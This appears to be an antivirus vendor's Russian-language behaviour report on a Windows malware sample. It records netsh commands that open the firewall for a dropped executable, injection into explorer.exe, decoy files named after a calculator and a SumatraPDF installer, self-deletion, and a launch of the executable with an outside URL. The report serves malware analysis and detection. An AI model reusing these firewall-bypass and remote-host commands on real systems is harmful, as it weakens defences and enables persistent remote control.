Техническая информация
Вредоносные функции
Запускает на исполнение
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xfnobrpgmmrkdqa dir=in action=allow program="%TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe" enable=yes profile=public,private
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xfnobrpgmmrkdqa dir=out action=allow program="%TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe" enable=yes profile=public,private
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\explorer.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\nse8517.tmp\nsexec.dll
- %TEMP%\nse8517.tmp\basiccalculator1.exe
- %TEMP%\nse8517.tmp\sumatrapdf-3.5.2-64-install.exe
- %TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe
- %TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe.config
- %TEMP%\nse8517.tmp\selfdel.dll
Удаляет следующие файлы
- %TEMP%\nse8517.tmp\basiccalculator1.exe
- %TEMP%\nse8517.tmp\nsexec.dll
- %TEMP%\nse8517.tmp\selfdel.dll
- %TEMP%\nse8517.tmp\sumatrapdf-3.5.2-64-install.exe
- %TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe
- %TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe.config
Самоудаляется.
Другое
Создает и запускает на исполнение
- '%TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe' "http://www.textuallyinclud.click" "%TEMP%\nse8517.tmp\7530"
Запускает на исполнение
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xfnobrpgmmrkdqa dir=out action=allow program="%TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe" enable=yes profile=public,private (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xfnobrpgmmrkdqa dir=in action=allow program="%TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe" enable=yes profile=public,private (со скрытым окном)
